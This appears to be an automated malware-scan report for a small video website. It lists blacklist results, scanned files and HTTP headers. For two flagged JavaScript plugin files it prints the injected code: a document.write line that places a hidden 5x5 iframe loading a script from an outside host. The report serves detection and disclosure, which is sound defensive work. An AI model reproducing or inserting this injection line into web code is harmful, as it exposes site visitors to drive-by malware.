Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jonclarkvideo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jonclarkvideo.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jonclarkvideo.com/ | 200 OK Content-Length: 18506 Content-Type: text/html | clean |
http://jonclarkvideo.com/media/system/js/caption.js | 200 OK Content-Length: 2150 Content-Type: application/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://jonclarkvideo.com/plugins/content/sigplus/js/safemode.initialize.min.js | 200 OK Content-Length: 736 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/sigplus/js/safemode.finalize.min.js | 200 OK Content-Length: 419 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/sigplus/engines/boxplus/popup/js/boxplus.min.js | 200 OK Content-Length: 10407 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof __jQuery__=="undefined")var __jQuery__=jQuery; (function(d){function y(a,b){var c=parseInt(a.css(b));return isNaN(c)?a[b]():c}function s(a){return y(a,"width")}function F(a,b){return parseInt(a.css("margin-"+b))||0}function G(a){var b=a.charAt(0).toUpperCase()+a.slice(1),c="client"+b,e=w[c];c=document.documentElement[c];b=window["inner"+b];e=e?e:Infinity;c=c?c:Infinity;b=b?b:Infinity;return Math.min(e,c,b,d(window)[a]())}function za(a){var b=a.attr("src");a=a.attr("longdesc");retur function(a){na(this).boxplusConfigure(a);return this};d.boxplus={change:u,previous:T,next:U,refresh:J,configure:function(a){return d.extend(Z,a)}}})(__jQuery__); ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://jonclarkvideo.com/plugins/content/sigplus/engines/boxplus/lang/boxplus.lang.min.js | 200 OK Content-Length: 3474 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof __jQuery__=="undefined")var __jQuery__=jQuery; (function(a){var e="",f={en:{language:"English",first:"First",prev:"Previous",next:"Next",last:"Last",start:"Start slideshow",stop:"Stop slideshow",close:"Close",enlarge:"Enlarge",shrink:"Shrink",download:"Download",metadata:"Image metadata"},de:{language:"Deutsch",first:"Erstes",prev:"Zurück",next:"Weiter",last:"Letztes",start:"Diashow starten",stop:"Diashow anhalten",close:"SchlieÃen",enlarge:"VergröÃern",shrink:"Verkleinern",dow a("span.boxplus-"+d).html(h)})}return e};a(function(){var b=/lang=([a-z]{2,})(?:-([A-Z]{2,}))?/;a('script[src*="boxplus"][src*=lang]').each(function(){var c=b.exec(a(this).attr("src"));c&&a.boxplusLanguage(c[1],c[2])})})})(__jQuery__); ;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://jonclarkvideo.com/plugins/content/sigplus/engines/boxplus/slider/js/boxplus.slider.min.js | 200 OK Content-Length: 4703 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://jonclarkvideo.com/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 8093 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 16475 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 12253 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 2358 Content-Type: application/javascript | clean |
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://jonclarkvideo.com/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=54 | 200 OK Content-Length: 5404 Content-Type: text/html | clean |
http://jonclarkvideo.com/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=55 | 200 OK Content-Length: 17428 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jonclarkvideo.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 19:55:12 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 Jun 2014 19:55:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0676f3e0e4e5d22e79876d1e00e70bad=b26c67313a1ef68164535b2ec3dd0536; path=/
GET / HTTP/1.1
Host: jonclarkvideo.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 19:55:12 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 Jun 2014 19:55:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0676f3e0e4e5d22e79876d1e00e70bad=b26c67313a1ef68164535b2ec3dd0536; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: jonclarkvideo.com
Referer: http://www.google.com/search?q=jonclarkvideo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jonclarkvideo.com
Referer: http://www.google.com/search?q=jonclarkvideo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.